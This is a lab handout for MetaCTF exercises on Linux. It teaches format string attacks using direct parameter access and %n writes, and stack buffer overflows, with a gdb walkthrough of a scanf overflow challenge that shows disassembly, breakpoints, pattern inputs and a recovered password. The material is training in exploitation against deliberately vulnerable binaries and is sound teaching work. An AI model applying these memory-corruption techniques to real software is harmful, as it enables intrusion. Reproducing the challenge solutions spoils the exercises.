Linux Buffer Overflows and Advanced Format String Attacks

Learn advanced software security exploitation techniques including format string attacks and buffer overflow vulnerabilities on Linux systems.

Lab Overview

In this lab, you will face some additional challenges designed to help you develop your understanding of software security and vulnerabilities. You will learn how to perform Format String Attacks, a type of vulnerability that allows attackers to manipulate the memory of a program by exploiting how it handles format specifiers. Additionally, you will further explore Buffer Overflows, a common security issue that arises when programs do not properly manage memory, leading to the overwriting of critical data.


Contents

    Lab overview

    This week’s topic involves a practical exploration of exploits on Linux based systems. The practical challenges involve exploiting buffer overflow vulnerabilities and a format string vulnerability. Three flags are available from MetaCTF challenges, two for challenges involving buffer overflows and one which requires you to perform a more advanced format string attack.

    Format String Attacks

    ==VM: On your Desktop Debian Linux VM==

    ==action: Browse the challenges directory==

    ls ~/challenges
    

    When you run each program it will give you instructions and hints on how to solve the challenge.

    ==action: Run each of the challenges (always after changing to the directory first)==:

    Following on from prior labs, this week includes another format string challenge. Similar to the previous challenges, this executable was compiled with stack protections and ASLR disabled.

    Direct Memory Access

    The $ symbol allows us to directly access a variable on the stack.

    ==action: Experiment with the input in order to see which element on the stack we control==. We can do this with our direct memory lookup ($) rather than manually calculating the offset.

    ==hint: e.g. “AAAA%4$08x”==

    cd Ch3_Format5_nTargetWrite/
    
    ./Ch3_Format5_nTargetWrite
    
    Previously, we placed the address to write to onto the stack so that it
    was easy to discover and target with %n.  Unfortunately, this will not
    always be present.  However, because the input string being used in the
    printf call is usually stored on the stack, it is possible to inject the
    address we want to write into as part of our input and then use a targeted
    %n to write into the injected address. To do so, you will first locate
    where the input string characters are located on the stack relative to
    the vulnerable printf call by injecting a well-known string and then using
    a series of %x format specifiers to determine its offset on the stack from
    the printf call.  To do so, use an input string similar to:
       "ABCD-%x-%x-%x-%x-%x...."
    Look at the resultant output to see where the hexadecimal representation
    of ABCD appears (e.g. 44434241 for little-endian machines).  Once we find
    our input on the stack, note its parameter number since this is the
    number we will then target with a subsequent %n.  After noting this number
    we can then replace the "ABCD" part of the input with an actual address.
    At this point, we need to find what address to write to and the value
    we need to write.  For this level, you are asked to overwrite a variable
    called key with a specific number.  To determine the address of key and
    the value to write into it, examine the disassembly of the program.
    Locate the comparison that determines whether or not the level has been
    completed.  The value of key is moved from a specific memory location
    to a register before being checked against a specific value.  Note that
    we have made the address of this memory location representable as an ASCII
    string to make things easier for you to input as a string.  By using this
    in place of ABCD, you will then be able to follow it with an appropriately
    calculated %<num1>x%<num2>$n to solve the level.
    
    The key should equal to 265.
    Enter the password:
    

    Click here for some additional notes and tips for this challenge.

    Buffer Overflows on Linux Systems

    Some programming languages require the programmer to manually manage memory. This involves defining how much memory is allocated for a variable to store data in. Programmers can make incorrect assumptions whilst reserving memory for variable-length pieces of data.

    If a user can supply data which is insecurely copied to a memory location which is not large enough to contain it, adjacent memory can be overwritten.

    If the memory location being written to is stored on the stack (i.e. as a local function variable or a function parameter), adjacent memory may contain critical data that is used in the control flow of the program. A prime example of this is the return address, which is pushed onto the stack when a function is called so that the program knows where to return to. If we can overwrite this address, we can make the program return to another location.

    Buffer overflow CTF challenges

    cd Ch3_07_StackSmash/
    
    ./Ch3_07_StackSmash
    
    One way attackers used to leverage buffer overflow bugs to gain control of
    a running program is to overwrite the return address of the function being
    executed on the stack.  When the function returns, it returns to an address
    the attacker chooses.  In this level, you are to overflow the buffer being
    used to read in the password in a way that overwrites the return address of
    the function it is in (unsafe_input).  A quick strategy to determine the
    size of the unsafe buffer is to "fuzz" the program with a large sequence
    of characters such as (AABBCCDDEEFFGG...) and see which ones appear during
    critical execution points such as the return from unsafe_input. To simplify
    the task of corrupting the return address, the location of the call you want
    to return to that unlocks the program is in the ASCII range.  Be mindful of
    endianness and ensure that you only overwrite the low 32-bits to point to
    the function you want to return to.
    
    Enter the password:
    
    cd Ch3_07_ScanfOverflow//
    
    ./Ch3_07_ScanfOverflow
    
    When receiving input from a user, it is important to limit the number
    of characters accepted so that the input buffer does not overflow.
    This level has the following code that is vulnerable to a buffer overflow.
        char buff[N];
        char guess[N];
        strncpy(guess,"REPLACE",8));
        .....
        scanf("%s",buff);
        if(strcmp(guess,password)==0)
    In the code, the password variable stores the password and the guess
    variable is filled in with the string REPLACE.  The strcmp is thus setup
    to always fail.  However, the user's input buffer (buff) is vulnerable to
    overflow since the scanf does not have a length delimiter associated
    with it.  In this case, characters beyond buff will end up in guess.
    Using the debugger, find what the password is, then determine the number
    of bytes needed to overflow the buffer.  Finally, generate an input that
    will overflow buff to place the password in guess.
    
    Enter the password:
    

    Tip: This challenge has a vulnerable scanf() call, within the user_input(param) function. The function call is vulnerable as there is no bounds checking and the user controls the input string. We are reading from stdin and storing the value in buff[n]. We can pass more than n characters into buff[], leading to a buffer overflow vulnerability. This allows us to overwrite contiguous memory. First off you should run the program within gdb, e.g. gdb -q ./Ch3_07_ScanfOverflow (the -q flag is ‘quiet mode’ which doesn’t print the long copyright intro text) If we disassemble main we can see that there is a call to user_input at main <+160>:

    serpent@p-26-220-10-vIM8-5-linux-bof-format-metactf-desktop:~\~/challenges/Ch3_07_ScanfOverflow$ gdb -q ./Ch3_07_ScanfOverflow 
    
    Reading symbols from ./Ch3_07_ScanfOverflow...(no debugging symbols found)...done.
    
    (gdb) disassemble main
    
    Dump of assembler code for function main:
       ...
       0x000000000040138b <+153>:   lea    rax,[rbp-0x10]
       0x000000000040138f <+157>:   mov    rdi,rax
       0x0000000000401392 <+160>:   call   0x4011b2 <user_input>
       ...
    End of assembler dump.
    

    The main function contains some print statements and this user_input call, which has 1 parameter. This parameter is stored in $rdi before the function is called (per the x86_64 linux calling conventions).

    (gdb) x/s $rdi
    
    0x7fffffffdfd0: "M2Y4MDg4\b"
    

    Note: Interesting looking string, probably our password…

    ==action: We should then disassemble user_input to see what’s happening inside the function==.

    (gdb) disassemble user_input
    
    Dump of assembler code for function user_input:
       ...
       0x00000000004011fb <+73>:    lea    rax,[rbp-0x10]
       0x00000000004011ff <+77>:    mov    rsi,rdx
       0x0000000000401202 <+80>:    mov    rdi,rax
       0x0000000000401205 <+83>:    call   0x4010a0 <strcmp@plt>   
       0x000000000040120a <+88>:    test   eax,eax
       0x000000000040120c <+90>:    jne    0x401224 <user_input+114>
       0x000000000040120e <+92>:    mov    edi,0x40201c
       0x0000000000401213 <+97>:    call   0x401040 <puts@plt>
       0x0000000000401218 <+102>:   mov    eax,0x0
       0x000000000040121d <+107>:   call   0x401231 <printflag>
       0x0000000000401222 <+112>:   jmp    0x40122e <user_input+124>
       0x0000000000401224 <+114>:   mov    edi,0x402026
       0x0000000000401229 <+119>:   call   0x401040 <puts@plt>
       ...
    End of assembler dump.
    

    Next we should figure out what’s happening here. We want to work backwards from our printflag call + try figure out what we need to provide to get there. <+83> is a call to strcmp, comparing the contents of $rsi and $rdi <+90> is a jump-not-equal instruction, which jumps to <+114> if the strings do not match <+107> is our call to printflag (win function), which runs if the strings match <+114> loads some data into $edi, which is used as a parameter for… <+119> printing the ‘Try again’ message. So… we need to find out how $rsi and $rdi are populated prior to this strcmp call at user_input <+83>.

    ==action: Let’s set a breakpoint at the strcmp call at 0x0000000000401205, then inspect the registers without any input that would overflow the buffer==:

    (gdb) break *0x0000000000401205
    
    Breakpoint 2 at 0x401205
    
    (gdb) c
    
    Continuing.
    
    Enter the password: asdf
    
    Breakpoint 2, 0x0000000000401205 in user_input ()
    
    (gdb) x/s $rsi
    
    0x7fffffffdfd0: "M2Y4MDg4\b"
    
    (gdb) x/s $rdi
    
    0x7fffffffdfa0: "REPLACE"
    

    Note: OK so we can see that the 2 parameters to strcmp contain the password, with a \b character (which is odd…) and the string REPLACE

    Now we’ve got our breakpoint set up, we can pass in a long pattern string to see which of these registers we’re influencing (and here’s the misleading part…)

    (gdb) r <<< $(printf "AAAAAAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOO")
    
    The program being debugged has been started already.
    
    Start it from the beginning? (y or n) y
    
    Starting program: /home/serpent/challenges/Ch3_07_ScanfOverflow/Ch3_07_ScanfOverflow <<< $(printf "AAAAAAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOO")
    
    ...
    
    Breakpoint 1, 0x0000000000401392 in main ()
    
    (gdb) c
    
    Continuing.
    
    Breakpoint 2, 0x0000000000401205 in user_input () (gdb) x/s $rsi 0x7fffffffdfd0: "JJJJKKKKLLLLMMMMNNNNOOOO" (gdb) x/s $rdi 0x7fffffffdfa0: "REPLACE"
    

    Note: The $rdi and $rsi registers above contain the parameters that get passed to the strcmp function (i.e. the two strings that are being compared). Note that our input ends up in rsi whereas the string replace ends up in rdi rather than the password.

    Conclusion

    At this point you have:

    • Written a format string attack to overwrite a variable with a memory address

    • Exploited some buffer overflows on Linux

    Well done!